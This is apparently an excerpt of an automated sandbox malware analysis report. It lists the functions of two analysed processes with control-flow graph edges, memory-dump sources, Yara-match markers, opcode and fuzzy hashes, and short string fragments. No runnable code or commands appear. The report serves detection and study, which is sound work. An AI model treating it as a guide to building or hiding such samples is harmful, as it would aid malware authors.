                                                                        control_flow_graph 668 22a9329e-22a932d6 call 22a75990 671 22a932dc-22a932eb 668->671 672 22a9338e-22a93390 668->672 673 22a9336b-22a9337b 671->673 674 22a932ed 671->674 675 22a93355-22a93366 call 22aa4c30 672->675 677 22a932ef-22a9332a call 22aa2e60 673->677 674->677 681 22a9332c-22a93341 GetPEB call 22a73ca0 677->681 682 22a93380-22a93387 677->682 688 22a93343-22a93349 681->688 689 22a93367-22a93369 681->689 682->681 683 22a93389-22ad29f4 call 22aa2b60 GetPEB call 22a73ca0 682->683 683->681 692 22a9334b-22a93351 688->692 693 22a93392-22a93399 688->693 690 22a93353 689->690 690->675 692->690 692->693 693->690
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .Local\$@
                                                                        • API String ID: 0-380025441
                                                                        • Opcode ID: 6026f2dd9ef1ef07332d00184605534bd27a5a7e1edce8d3fecacaada90d42ef
                                                                        • Instruction ID: 7daf705d2ef3e24226fc2bf0c73cf9826acf38871cd35462d646d483af64c9ca
                                                                        • Opcode Fuzzy Hash: 6026f2dd9ef1ef07332d00184605534bd27a5a7e1edce8d3fecacaada90d42ef
                                                                        • Instruction Fuzzy Hash: 3E317E765893049FC311CF29C580A5BBBF8FBC4754F40096EF9948BA10DA34DD04CB92
                                                                        Function 22A592FF Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 696 22a592ff-22a59312 697 22a59314-22a59325 RtlDebugPrintTimes 696->697 698 22a5932d-22a59339 call 22a59353 696->698 697->698 701 22a5934f-22a59352 698->701 702 22a5933b-22a5934a GetPEB call 22a73ca0 698->702 702->701
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID:
                                                                        • API String ID: 3446177414-0
                                                                        • Opcode ID: 260fe606b8edb328fc609a0cd26ed7e1f0b87067435bd0707fba7f9c334e116d
                                                                        • Instruction ID: a09acc483d3257b40f453e771637a5023eb7d9021b0ec2f531bb8c32af8ac236
                                                                        • Opcode Fuzzy Hash: 260fe606b8edb328fc609a0cd26ed7e1f0b87067435bd0707fba7f9c334e116d
                                                                        • Instruction Fuzzy Hash: FEF0F032240740ABD7319B19CE08F8BBBFDEF94710F08055CA54687490C6B0A908C690
                                                                        Function 22A9E284 Relevance: .2, Instructions: 212COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7240e65f03ae9fc22e25736e15683e5ddea7bfffbcf77add54be727e0368cb0a
                                                                        • Instruction ID: e2d2cb8d097e610ecdc2f3cfcce7bad6c677afc23e459f8c7731b622230d5ac9
                                                                        • Opcode Fuzzy Hash: 7240e65f03ae9fc22e25736e15683e5ddea7bfffbcf77add54be727e0368cb0a
                                                                        • Instruction Fuzzy Hash: FD815971A00709AFDB11CFA6CA80BDEBBFAFF88354F10442AE555A7651D730AD45CB60
                                                                        Function 22AF62A0 Relevance: .2, Instructions: 198COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7d590ff0fa7cee1df18fc6916afe01121ff311fb00118cf11ddd9e2f907ff7df
                                                                        • Instruction ID: 4468042bc509eb613e5e96908b1c7bbb8e84afa5a36159e196e77a1cb3d56c9e
                                                                        • Opcode Fuzzy Hash: 7d590ff0fa7cee1df18fc6916afe01121ff311fb00118cf11ddd9e2f907ff7df
                                                                        • Instruction Fuzzy Hash: 6671F232240701AFD722DF28CA90F5AB7F5FF40B65F104918F6658BAA0D77AE944CB50
                                                                        Function 22B292A6 Relevance: .2, Instructions: 174COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 13ee7e90f6b4712ef37ba3fad34f0d35ba6e0c7ce47069d99704bba1fa85b26b
                                                                        • Instruction ID: a9ef6030b59f9924d5d07bc1dc1c22de6ee6d75824884e19520ebe3680b3ee6e
                                                                        • Opcode Fuzzy Hash: 13ee7e90f6b4712ef37ba3fad34f0d35ba6e0c7ce47069d99704bba1fa85b26b
                                                                        • Instruction Fuzzy Hash: 6B613A31604F818FD321CF64C694B5AB7E0FF98708F244A6DE99D8B291DB35E806C791
                                                                        Function 22A702E1 Relevance: .1, Instructions: 106COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                        • Instruction ID: 15c5f8674c83ba02b6daa08b5d9ac08e3865e77c628fd85aea4738c8065f2732
                                                                        • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                        • Instruction Fuzzy Hash: FA310331A08344AFDB118B68CD80F9EBFF9AF14350F0442A6E855D7B52D7B4D984CBA8
                                                                        Function 22A692C5 Relevance: .1, Instructions: 89COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                                        • Instruction ID: 73dce8c7435dfa7827a6fc02ba0011d8b10d824684e7c30eb7e042fa51360a9e
                                                                        • Opcode Fuzzy Hash: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                                        • Instruction Fuzzy Hash: 9831BCB160834A8FCB05DF18D940A6A7BE9FF99710F00056AF850DB7A1C730DC00CBA6
                                                                        Function 22AE0283 Relevance: .1, Instructions: 74COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0fc01fb02f2d96b90c60e96bf66729137bce37e8db0aa1fe6dd3733303fefc58
                                                                        • Instruction ID: 8fbd930094609f3b30cccc270c25860b4c7a423b0e869a064d660c16bff3c90e
                                                                        • Opcode Fuzzy Hash: 0fc01fb02f2d96b90c60e96bf66729137bce37e8db0aa1fe6dd3733303fefc58
                                                                        • Instruction Fuzzy Hash: 2021D3726443459BC301DF69CA84F6BFBECAF90744F044466BE85EB951D730C90AC6A2
                                                                        Function 22AF72A0 Relevance: .1, Instructions: 53COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                                                        • Instruction ID: 9c3bed519216613802435c59681272287601e062c1993b479dcd0b66c5a5f53e
                                                                        • Opcode Fuzzy Hash: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                                                        • Instruction Fuzzy Hash: E3016D72280705BFE6119F61CE90EA2FB7DFF64794F500525F25046960C766ACA0CAA4
                                                                        Function 22B1F2F8 Relevance: .0, Instructions: 41COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 651bad411510aff1270d2d72552cbb3cb57444d138a9d472b7171bea30eba57d
                                                                        • Instruction ID: 31bc01db04861eb219cb473ed24a503cebcd43d54d1dbea2eedafb97d5e2e9da
                                                                        • Opcode Fuzzy Hash: 651bad411510aff1270d2d72552cbb3cb57444d138a9d472b7171bea30eba57d
                                                                        • Instruction Fuzzy Hash: C2F0A472F50348ABD704DFB9D515AAEB7B8EF44710F008456F501EB690DA74DA01C761
                                                                        Function 22B35283 Relevance: .0, Instructions: 31COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 10e6a6cb8314cda92db43b483105315e1891231ec41bf004bdf7212f52c8fcf8
                                                                        • Instruction ID: da145c46a1c2f601aa7b8f82b0016354b9b795bef782bcad053a625850c3a2b5
                                                                        • Opcode Fuzzy Hash: 10e6a6cb8314cda92db43b483105315e1891231ec41bf004bdf7212f52c8fcf8
                                                                        • Instruction Fuzzy Hash: 4DF05E70B50748ABDB04DFA9DA15EAEB7B4FF18304F408859B941EB291EB74E900CB54
                                                                        Function 22B352E2 Relevance: .0, Instructions: 31COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4b23dd7a2ac5a69873f0b64e6c38c60e7e9372c7b439486127dc38fa349b798c
                                                                        • Instruction ID: 11957a91b1a0ac61ace7902b5dfc7960f83c9bbc8393ae7fe94045e9d4935cd0
                                                                        • Opcode Fuzzy Hash: 4b23dd7a2ac5a69873f0b64e6c38c60e7e9372c7b439486127dc38fa349b798c
                                                                        • Instruction Fuzzy Hash: A6F05E70A50788ABDB04DFB9D656E6EB7B4EF18304F408459B901EB291EA74EA00CB54
                                                                        Function 22AE92BC Relevance: .0, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e2fec76dcee738e1c739839fd8e3058a51f5a4a1702bd67bcf531b050a41f76c
                                                                        • Instruction ID: ee22b62e9a99068c48d961d65070d1ee24ea9f7abafeec92eb858cf0f50e9078
                                                                        • Opcode Fuzzy Hash: e2fec76dcee738e1c739839fd8e3058a51f5a4a1702bd67bcf531b050a41f76c
                                                                        • Instruction Fuzzy Hash: B7F0C934651B81CBE71ACF04C1E1B5173B9FB45B84F5004A8D8464FFA1C73A9942CA40
                                                                        Function 22A702A0 Relevance: .0, Instructions: 13COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                        • Instruction ID: 7d932864685037fe929d1136e94e4f92367d1872bf4910d9609a83ef2bc4dbc6
                                                                        • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                        • Instruction Fuzzy Hash: ABD0C93A616F80CFD206CB08C6A1F1A73B4BB44B84F810490E541CBF22E62CD940CA44

                                                                        Executed Functions

                                                                        Function 02FB4972 Relevance: .1, Instructions: 110COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b7319d59db7b4e06e0f9674278f0539f904688b6b9bb3370e4803de1a27b97b8
                                                                        • Instruction ID: b47cf16508ab06073c217c04de0d4799b09caa25abe9dec67ff0e0a9bbf0e354
                                                                        • Opcode Fuzzy Hash: b7319d59db7b4e06e0f9674278f0539f904688b6b9bb3370e4803de1a27b97b8
                                                                        • Instruction Fuzzy Hash: E3319411A593F14DD31E836D08BD675AFC24F5720174EC2EEDADA5F2E3C4888419D3A5
                                                                        Function 02FB4230 Relevance: 22.8, Strings: 18, Instructions: 340COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0$ 4$(2$*\$/_$3U$:$:$J9$J]$Yj$cp$iu$jg$m$w`$~+$~[
                                                                        • API String ID: 0-1778842444
                                                                        • Opcode ID: 93d0ce2f71425aae2626d8af6dee784df82cb3efb50ffb450ebbba99086de9ca
                                                                        • Instruction ID: 8af2bd0fc4a211f075ab2eb77930a731d0abc9cf5a068ef3d58defdb861d2e03
                                                                        • Opcode Fuzzy Hash: 93d0ce2f71425aae2626d8af6dee784df82cb3efb50ffb450ebbba99086de9ca
                                                                        • Instruction Fuzzy Hash: EE1292B0D05268CBEB25CF55CAA4BDDBBB2BF44348F1081DAD2497B281C7B55A89CF50
                                                                        Function 02FC1D90 Relevance: 6.4, Strings: 5, Instructions: 153COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 6$O$S$\$s
                                                                        • API String ID: 0-3854637164
                                                                        • Opcode ID: 737269502d40f39a4e925d1e8c1d2850c38414c8e7089ec4e76dc4922a8c63b8
                                                                        • Instruction ID: 3a3fd925db806982f563c689edc9cdb4657bc36d14788ddaac26140a0e237312
                                                                        • Opcode Fuzzy Hash: 737269502d40f39a4e925d1e8c1d2850c38414c8e7089ec4e76dc4922a8c63b8
                                                                        • Instruction Fuzzy Hash: 1451AFB2D00119ABDB10DB94DC84BEFB379EF44355F4441ADEA0C96141E770AA58CFE1
                                                                        Function 02FAD7E2 Relevance: .1, Instructions: 139COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d8730710e20e5dcc2a22011382145b6a3544650baa3ee4f93d368119a8c63515
                                                                        • Instruction ID: 727d419d78573b017f8856223cbac90baac5536701203ea063c0d1638091ab08
                                                                        • Opcode Fuzzy Hash: d8730710e20e5dcc2a22011382145b6a3544650baa3ee4f93d368119a8c63515
                                                                        • Instruction Fuzzy Hash: BF413FB1D11219AFDB04CF99DC81AEEBBBDEF49B50F10415AFA14E6241D7B09640CBE0
                                                                        Function 02FD2820 Relevance: .1, Instructions: 85COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bba4785f8d05c4a076c1950401058ea4743479d876345d3c590acef88ece51e7
                                                                        • Instruction ID: 5ecdef304642a985461e98d9e2771821c9ac1eefbe0898c4dab2ec181b10937c
                                                                        • Opcode Fuzzy Hash: bba4785f8d05c4a076c1950401058ea4743479d876345d3c590acef88ece51e7
                                                                        • Instruction Fuzzy Hash: D431FCB5A00609AFDB14DF98DC41EEFB7BAEF88700F104209FE19A7240D770A9118FA5
                                                                        Function 02FD3120 Relevance: .1, Instructions: 77COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 48008a8885a8a178e059b35dd08e41ed4daf0c7d0b3b076b6a9debccc8c5e9b1
                                                                        • Instruction ID: a0ffc68d7ceb59f9be611f6691e29e7b46312f5537168afb93b33e7e38059726
                                                                        • Opcode Fuzzy Hash: 48008a8885a8a178e059b35dd08e41ed4daf0c7d0b3b076b6a9debccc8c5e9b1
                                                                        • Instruction Fuzzy Hash: A7214CB5A00209AFDB14DF98CC41FAFB7B9EF89740F004109FE1897240D770A9118FA5
                                                                        Function 02FC1BD0 Relevance: .1, Instructions: 75COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a3b62805aecb561c8d582efa8e853bcaa4f04543f9391eda20dae0d22279a175
                                                                        • Instruction ID: 454ac0ff2acc5311f07ce7587c2e93e4a618d20527ce109776e1a5c5603191b6
                                                                        • Opcode Fuzzy Hash: a3b62805aecb561c8d582efa8e853bcaa4f04543f9391eda20dae0d22279a175
                                                                        • Instruction Fuzzy Hash: B411C6B27802097BF320AA159C83FAB375E9F85B55F284004FB08AE2C1D6A4B8114BF4
                                                                        Function 02FD2630 Relevance: .1, Instructions: 65COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e5231f87c4faa1c31e6d245ec425da63c60413e80fd13b1472b8af13470ab9c3
                                                                        • Instruction ID: 1267e141eb0dcb03fce36a95a64ac84b4b9483b032a3de7900a98218c27a431f
                                                                        • Opcode Fuzzy Hash: e5231f87c4faa1c31e6d245ec425da63c60413e80fd13b1472b8af13470ab9c3
                                                                        • Instruction Fuzzy Hash: 4F1193716007087BD720EF94CC45FAF7779EB85710F004549FE195B280D77069118FA5
                                                                        Function 02FCF0E0 Relevance: .1, Instructions: 65COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bbfe9eea5b3d8900fe4173ac21f6f7afdb1c19ddaf0df59e9af0125fdf460ece
                                                                        • Instruction ID: 0f263ee52e0ab392873a9a21dd4d67464d60d9a599a44bbe6c8a726a1b80c87a
                                                                        • Opcode Fuzzy Hash: bbfe9eea5b3d8900fe4173ac21f6f7afdb1c19ddaf0df59e9af0125fdf460ece
                                                                        • Instruction Fuzzy Hash: 392121B6D0121DAF9B00DFA9D9418EFB7F9EF48304F14825EE919E7200E7705A058BE1
                                                                        Function 02FD24B0 Relevance: .1, Instructions: 65COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 99b439b0cb10a14fb0478847b80ce411d567114a137e28431b42ff8e2faf565b
                                                                        • Instruction ID: 7987ba3f95f053035018dde521b1b167f574a8accde964625a1d8d842171bbb2
                                                                        • Opcode Fuzzy Hash: 99b439b0cb10a14fb0478847b80ce411d567114a137e28431b42ff8e2faf565b
                                                                        • Instruction Fuzzy Hash: 86116071A00308BBD720EF94DC45FAFB7AAEF85740F104549FE186B280E77169158FA5
                                                                        Function 02FD0420 Relevance: .1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
